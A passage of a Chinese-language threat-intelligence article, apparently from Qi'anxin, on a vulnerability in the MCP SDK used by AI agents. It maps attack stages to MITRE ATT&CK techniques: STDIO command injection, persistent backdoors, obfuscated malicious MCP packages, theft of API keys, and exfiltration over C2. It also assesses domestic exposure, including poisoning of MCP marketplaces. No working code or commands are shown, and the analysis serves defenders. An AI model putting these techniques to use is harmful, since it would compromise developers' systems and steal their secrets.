initial;text-decoration-color: initial;max-width: 100%;overflow: auto;"><table style="box-sizing: border-box;border-width: 0px;border-style: solid;border-color: inherit;border-image: initial;margin-top: 0px !important;margin-right: 0px;margin-bottom: 0px;margin-left: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);text-indent: 0px;border-collapse: collapse;border-spacing: 0px;color: rgb(10, 10, 10);"><thead><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><th style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;background: rgba(0, 0, 0, 0.05);text-align: left;"><p><span leaf="">战术阶段</span></p></th><th style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;background: rgba(0, 0, 0, 0.05);text-align: left;"><p><span leaf="">技术ID</span></p></th><th style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;background: rgba(0, 0, 0, 0.05);text-align: left;"><p><span leaf="">技术名称</span></p></th><th style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;background: rgba(0, 0, 0, 0.05);text-align: left;"><p><span leaf="">适用场景</span></p></th></tr></thead><tbody><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">初始访问</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1190</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">利用面向公众的应用</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">暴露的MCP服务器</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">执行</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1059</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">命令与脚本解释器</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">通过STDIO注入的命令执行</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">执行</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1053</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">计划任务/作业</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">持久化部署后门</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">持久化</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1543</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">创建/修改系统进程</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">通过MCP建立持久化控制</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">权限提升</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1068</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">利用特权升级漏洞</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">命令以高权限执行</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">防御规避</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1027</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">混淆文件或信息</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">恶意MCP包编码混淆</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">凭证访问</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1552</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">未保护凭证</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">窃取API密钥和环境变量</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">横向移动</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1021</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">远程服务</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">通过MCP扩展攻击范围</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">数据外泄</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">T1041</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">通过C2通道外泄</span></p></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">窃取敏感数</span></p></td></tr></tbody></table></p><h2 style="padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">国内关联影响评估</span></h2><h3 style="display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">波及范围</span></h3><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">从奇安信威胁情报中心监测数据来看，该漏洞对国内AI开发生态的影响体现在以下层面：</span></p><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">开发者生态层面</span></strong><span leaf="">：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 国内大量AI应用基于Python开发，官方Python SDK受影响</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 开源AI框架（如LangFlow、Flowise）在GitHub上拥有大量国内开发者Fork和Star</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 主流AI编程助手（通义灵码、文心快码等）虽未在原报告提及，但若采用MCP协议同样面临风险</span></p></li></ul><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">企业应用层面</span></strong><span leaf="">：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 互联网企业AI Agent开发普遍采用MCP协议连接外部工具</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 金融、政务领域AI应用集成MCP进行数据对接</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 云服务商MCP相关产品线潜在受影响</span></p></li></ul><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">供应链层面</span></strong><span leaf="">：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• MCP市场投毒可影响国内开发者通过镜像站获取的工具包</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 攻击者可通过国内技术社区传播恶意MCP包</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 开发环境容器镜像若包含易受攻击的MCP SDK，将导致大规模扩散</span></p></li></ul><h3 style="display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">威胁行为体归因分析</span></h3><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">初级威胁行为体</span></strong><span leaf="">（脚本小子）：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 技术门槛低：STDIO注入无需高级漏洞利用技术</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 工具易获取：MCP市场投毒可批量自动化</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 